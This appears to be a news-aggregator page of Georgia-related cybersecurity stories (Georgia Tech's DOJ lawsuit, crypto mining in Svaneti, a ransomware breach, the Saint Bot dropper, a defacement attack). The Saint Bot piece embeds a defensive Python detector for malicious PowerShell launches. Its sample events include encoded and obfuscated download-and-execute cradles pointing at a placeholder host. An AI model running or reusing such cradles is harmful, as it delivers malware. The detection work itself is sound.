
Georgia Tech Faces DOJ Lawsuit Over Alleged Lapses in Cybersecurity for Defense Contracts


Researchers at the Georgia Institute of Technology, which has received over $1 billion in Defense Department contracts, are facing scrutiny for allegedly failing to secure their computers and servers on the grounds that doing so was too “burdensome.” Since 2013, the Department of Defense has required any contractor handling sensitive data to provide “adequate security” on its systems. 

However, at Georgia Tech, laboratory directors reportedly resisted developing a security plan and opposed IT department efforts to implement basic antivirus and anti-malware software. Two IT department employees filed a whistleblower lawsuit, leading the Department of Justice (DOJ) to join the case against the university and the Georgia Tech Research Corporation (GTRC), the nonprofit entity managing government contracts. The lawsuit claims that the Astrolavos Lab at Georgia Tech delayed creating and implementing a security plan, as required by the government contracts. 

When a plan was finally created in 2020, it did not cover all relevant devices, according to the DOJ. Furthermore, the lab, whose mission is to address the security of emerging technologies critical to national security, did not install or update antivirus or anti-malware tools until December 2021. The lab allegedly fabricated compliance reports sent to the Defense Department. The reasons behind these alleged security lapses reportedly stem from campus politics. The DOJ complaint suggests that researchers bringing in substantial government funding were viewed as “star quarterbacks,” using their influence to resist compliance with federal cybersecurity mandates. 

Between 2019 and 2022, GTRC secured more than $1.6 billion in government contracts, with over $423 million in 2022 alone. The whistleblowers, Christopher Craig and Kyle Koza, filed the suit under the False Claims Act, allowing them to receive a portion of any recovered funds. Georgia Tech and GTRC face nine counts, including fraud, breach of contract, negligence, and unjust enrichment, with the DOJ seeking damages to be determined at trial. The DOJ stressed the importance of cybersecurity compliance by government contractors to safeguard U.S. information against threats from malicious actors. 

Meanwhile, Georgia Tech expressed disappointment at the DOJ’s filing, arguing it misrepresents the university’s culture and integrity, claiming that the government itself had indicated that the research did not require cybersecurity restrictions. Georgia Tech has vowed to dispute the case in court, maintaining that there was no data breach or leak and reaffirming its commitment to cybersecurity and collaboration with federal agencies.  

This case is notable given recent cybersecurity threats faced by major universities, such as the University of Utah and Howard University, where ransomware attacks have resulted in significant financial losses.

Georgia goes after crypto miners

On January 10, Georgian Economy Minister Natia Turnava told reporters that the Government of Georgia and the energy distribution company Energo-pro Georgia are working to stop the illegal mining of cryptocurrencies in the Svaneti region, which is overloading the power grid.

The problem stems from a sharp increase in electricity consumption over the past year in the Mestia district of Svaneti. Widespread mining in the area is attributed to low tariffs for businesses in the highland area and free electricity for the local population.

In December, the Georgian authorities had to introduce an electricity supply schedule in Mestia due to network congestion and recurring accidents.

"Of course, illegal electricity consumption is unacceptable, especially the so-called problems with household mining, which, as we know, exist there. We are working with the local government, as well as with Energo-pro Georgia, which supplies electricity to Svaneti, to solve this issue step by step," Turnava said.

She added that she does not think it is justified to involve the police in identifying the mining farms. The Minister of Economy hopes that the population itself is aware of the threat the situation poses to the district's tourism sector and will act in its own interest.

It's interesting to note that at the end of December, Mestia residents held protests demanding the closure of mining farms and accused the authorities of patronizing miners.

Energo-pro Georgia announced that, in this situation, it will be forced to introduce tariffs for the population. Before the New Year, local residents swore on an icon in the church that they would shut down all mining farms in the area, but after the New Year the energy distribution company said that electricity consumption had not decreased.

According to a study by the Cambridge Center for Alternative Finance, in 2018 Georgia was in second place in terms of the amount of electricity spent on mining cryptocurrencies — 60 megawatts.

Georgia is actively working on the introduction of a digital national currency

The National Bank of Georgia is working on the introduction of the digital lari. The vice-president of the central bank, Papuna Lezhava, said that the pilot program is planned to be launched in 2022.

“85% of the world's central banks are already working on a digital currency, some are in the research stage, some are testing, some have already implemented, including China and the Bahamas. We also want to be at the forefront of this trend,” he told reporters on Tuesday.

“Digital currency is not a cryptocurrency, but the evolution of cash. It will most likely also be based on the blockchain, and will also be a fast and cheap payment method. However, unlike modern cryptocurrencies, there will be no mining. The National Bank will be the only issuer of digital currency,” noted Mr. Lezhava.

According to him, the digital lari will be able to compete with cryptocurrencies in some services, but will not have the character of speculative accumulation.

At the initial stage, the digital lari is planned to be introduced for retail sales.

The National Bank believes that the digital currency will help to increase the efficiency of the payment system and financial accessibility.

"Digital lari will become a faster and cheaper means of payment than traditional means. It will work 24 hours a day. All transactions do not require an Internet connection. But the main advantage is that it will be technologically open to other types of technologies and as compatible as possible. Today, neither paper lari nor other means of payment have such luxury," the Vice President of the Central Bank added.

Earlier, CySecurity News reported that the Verkhovna Rada of Ukraine had adopted a law legalizing cryptocurrencies, which will allow cryptocurrency to be used for settlement transactions.

St. Joseph’s/Candler (SJ/C) Suffered a Data Breach


A ransomware attack on one of the leading healthcare organizations in southeast Georgia compromised the protected health information (PHI) of employees and patients. According to its press release, on 17 June 2021 the Georgia healthcare system, which operates 116 sites around the state, noticed suspicious activity in its network. 

St. Joseph's/Candler of Savannah, Georgia, is a Magnet-certified institution for nursing excellence focusing on state-of-the-art technology and research. This non-profit health system comprises two of the oldest existing hospitals in the United States – St. Joseph's (1875) and Candler Hospital (1804) – serving 33 counties in southeast Georgia and the Low Country of South Carolina, and is also the region's leading and only religious healthcare organization. 

St. Joseph's/Candler (SJ/C) announced on 10 August that it had experienced a data security incident resulting in unauthorized access to patient and employee information. 

SJ/C promptly acted to disconnect and secure its systems, notified federal law enforcement, and launched a cybersecurity investigation. The investigation found that between 18 December 2020 and 17 June 2021 an unauthorized party had access to SJ/C's IT network, and that in a ransomware attack on that network the unauthorized party rendered files on SJ/C's IT systems inaccessible. 

According to the notice, the attackers may have accessed files containing information on both patients and employees, including protected health information. 

"SJ/C cannot rule out the possibility that, as a result of this incident, files containing patient and co-worker information may have been subject to unauthorized access,” it states. “This information may have included individuals' names in combination with their addresses, dates of birth, Social Security numbers, driver's license numbers, patient account numbers, billing account numbers, financial information, health insurance plan member ID numbers, medical record numbers, dates of service, provider names, and medical and clinical treatment information regarding care received from SJ/C.” 

The healthcare system has begun notifying the affected employees and patients. SJ/C is offering free credit monitoring and identity protection services to those affected by the breach, and has set up a dedicated incident response line for anyone who wants more information about it. 

In its press statement, SJ/C advises patients whose information may have been involved to review the statements they receive from their healthcare providers and to contact the provider promptly if they see services they did not receive. 

SJ/C stated that it has implemented enhanced security measures in response to the ransomware attack and “will continue to adopt additional safeguards and technical security measures to further protect and monitor its systems.”

New Malware Downloader Spotted in Targeted Campaigns


In recent weeks, a relatively sophisticated new malware downloader has emerged that, while not widely distributed yet, appears to be gaining momentum. Malwarebytes researchers recently discovered the Saint Bot dropper, as they have termed it, being used as part of the infection chain in targeted campaigns against government institutions in Georgia. 

Researchers discovered Saint Bot while investigating a phishing email carrying a zip file that contained malware they had never seen before. The zip file included an obfuscated PowerShell script disguised as a link to a Bitcoin wallet. According to Malwarebytes, the script started a chain of infections that ended with Saint Bot being dropped on the compromised system. 
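The first stage of the chain described above is an obfuscated PowerShell launch, which is also the stage a defender sees most clearly in process-creation telemetry. The following triage heuristic is an added example (it is neither Malwarebytes' code nor the actual Saint Bot script): it decodes `-EncodedCommand` payloads, strips PowerShell's backtick keyword-splitting, and scores command lines for download cradles, `Invoke-Expression`, hidden windows, and a launch parent that suggests an opened attachment. The event records, the URLs and the list of "attachment" parents are constructed for the example and are assumptions, not indicators from the campaign.

```python
"""Triage heuristic for PowerShell process-creation events like the one that
started the infection chain above (an obfuscated script launched from an
e-mail attachment).  Added example: not Malwarebytes' code and not the real
Saint Bot script.  The events below are constructed for illustration."""
import base64
import re

# Constructed sample events in the shape of a process-creation log
# (image, parent image, command line).  The URLs are placeholders.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_EVENTS = [
    # 0: encoded one-liner spawned from the shell, e.g. a double-clicked attachment
    {"image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc "
                + base64.b64encode(STAGE2.encode("utf-16le")).decode("ascii")},
    # 1: routine admin script; -ExecutionPolicy must not be mistaken for -EncodedCommand
    {"image": "powershell.exe", "parent": "cmd.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    # 2: no encoding, but backtick-split keyword and hidden window, launched from an archiver
    {"image": "powershell.exe", "parent": "winrar.exe",
     "cmdline": "powershell.exe -w hidden -c \"$u='http://example.invalid/x';"
                "IEX (New-Object Net.WebClient).Down`loadString($u)\""},
]

# PowerShell resolves '-e', '-ec', '-enc', ... to -EncodedCommand; '-ex...' is -ExecutionPolicy.
_ENC_RE = re.compile(r"-e(?!x)[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
_CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)
_IEX_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
_HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
_NOPROFILE_RE = re.compile(r"-nop(?:rofile)?\b", re.I)
_BYPASS_RE = re.compile(r"-ex\w*\s+bypass", re.I)
# Assumed set of launch parents that suggest a user opened an attachment or archive.
ATTACHMENT_PARENTS = {"explorer.exe", "outlook.exe", "winrar.exe", "7zfm.exe"}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (PowerShell uses UTF-16LE), or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return (score, reasons) for one event; higher means more downloader-like."""
    raw = event["cmdline"]
    reasons = []
    score = 0
    decoded = decode_encoded_command(raw)
    if decoded is not None:
        score += 2
        reasons.append("encoded_command")
    # A backtick inside a word is PowerShell's cheapest keyword-splitting trick
    # ('Down`loadString' still runs DownloadString); flag it, then strip all
    # backticks so keyword matching below sees the joined token.
    text = raw + " " + (decoded or "")
    if re.search(r"\w`\w", text):
        score += 1
        reasons.append("backtick_obfuscation")
    text = text.replace("`", "")
    checks = [
        (_CRADLE_RE, 3, "download_cradle"),
        (_IEX_RE, 2, "invoke_expression"),
        (_HIDDEN_RE, 1, "hidden_window"),
        (_NOPROFILE_RE, 1, "no_profile"),
        (_BYPASS_RE, 1, "execution_policy_bypass"),
    ]
    for rx, weight, label in checks:
        if rx.search(text):
            score += weight
            reasons.append(label)
    if event.get("parent", "").lower() in ATTACHMENT_PARENTS:
        score += 1
        reasons.append("attachment_parent")
    return score, reasons


def triage(events, threshold=5):
    """Return {index: (score, reasons)} for events scoring at or above threshold."""
    flagged = {}
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged[i] = (score, reasons)
    return flagged


if __name__ == "__main__":
    for i, (score, reasons) in triage(SAMPLE_EVENTS).items():
        print(f"event {i}: score {score} {reasons}")
```

The weights are deliberately crude: the point is that decoding and de-obfuscating before matching is what separates the two malicious launches from the benign `-ExecutionPolicy Bypass -File` run, which a naive `-e` prefix match would have flagged as an encoded command. On real telemetry, feed it the `CommandLine` and `ParentImage` fields of Sysmon event ID 1 or Windows event 4688 and tune the threshold against a baseline of legitimate administrative scripts.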

In each case, the attackers used Saint Bot to drop information stealers and other malware downloaders. According to the security vendor, the new loader is probably being used by a few different threat actors, implying that there are likely other victims. 

One of the information stealers Saint Bot has been observed dropping is Taurus, a malware tool designed to steal passwords, browser history, cookies, and auto-fill data. The Taurus stealer can also steal FTP and email client credentials, as well as system information such as configuration details and installed software. According to Malwarebytes, while Saint Bot has mostly been observed dropping stealers, the dropper is designed to deliver any malware to a compromised system. 

Malware droppers are specialized tools designed to install other malware on victim systems. One of the most notable recent examples is Sunburst, the backdoor distributed via poisoned SolarWinds Orion software updates to some 18,000 organizations worldwide. In that case, the first stage was specifically designed to deliver targeted payloads only to systems belonging to organizations of particular interest to the attackers. 

Basically, the downloaders are first-stage malware tools designed to deliver a wide range of secondary and tertiary commodity payloads, such as ransomware, banking Trojans, cryptominers, and other malicious tools. Some of the most popular droppers in recent years, such as Emotet, Trickbot, and Dridex, began as banking Trojans before their operators switched tactics and used their Trojans as malware-delivery vehicles for other criminals. 

Saint Bot, like many other droppers, has several obfuscation and anti-analysis features to help it evade malware detection tools. It is designed to detect virtual machines and, in some cases, to detect but not execute on systems located in certain Commonwealth of Independent States countries, a group of former Soviet republics that includes Russia, Azerbaijan, Armenia, Uzbekistan, Ukraine, and Moldova.

"As we were about to publish on this downloader, we identified a few new campaigns that appear to be politically motivated and where Saint Bot was being used as part of the infection chain. In particular, we observed malicious documents laced with exploits often accompanied by decoy files," a spokesman from Malwarebytes' threat intelligence team states. In all instances, Saint Bot was eventually used to drop stealers. 

According to Malwarebytes, while Saint Bot is not yet a widespread threat, there are indications that the malware's creators are still actively working on it. The security vendor says its investigation of Saint Bot shows that a previous version of the tool existed not long ago. "Additionally, we are also seeing new campaigns that appear to be from different customers, which would indicate that the malware author is involved in further customizing the product," a Malwarebytes spokesman said.

Georgia in a panic after a strange cyberattack


On October 28, several hundred websites in Georgia were attacked by hackers. As a result of the cyberattack, several Georgian TV companies stopped broadcasting. The website of the administration of the President of Georgia, Salome Zurabishvili, was also hit: when the site was opened, a photo of the fugitive former President of Georgia appeared with the inscription "I will be back." According to preliminary data, the damage is very large.

The State Security Service and the Ministry of Internal Affairs with the support of partner countries are investigating a massive cyber attack on public and private sites in Georgia.

The Georgian Ministry of Internal Affairs admitted on Tuesday that the attack could come from both Georgian territory and from abroad.

Political scientist Tornike Gordadze, who held the post of minister in the government of Saakashvili, believes that this is a vivid example of "the ineffective work of the government to ensure security against possible threats, including from Russia."

In addition, the French daily Le Monde saw a Russian connection in the large-scale cyberattack.

According to the newspaper, the current Georgian authorities are taking new steps to improve relations with the Kremlin in the hope of resuming trade with their Russian neighbor, as well as the extradition of alleged criminals. The hacker Yaroslav Sumbayev, who was arrested in Georgia in 2018 and is suspected of involvement in the murder of Colonel Evgenia Shishkina, an investigator of economic crimes and corruption offenses, was handed over to the Russian authorities on October 24, despite a statement by his lawyer about the risk of "inhuman treatment." The publication believes that the large-scale cyberattack could be retaliation from the hacker community.

Former analyst of the Georgian National Security Council and political affairs assistant to the Prime Minister of Georgia, political analyst Tornike Sharashenidze, did not rule out "the involvement of the Russian Federation in the hacker attack in Georgia."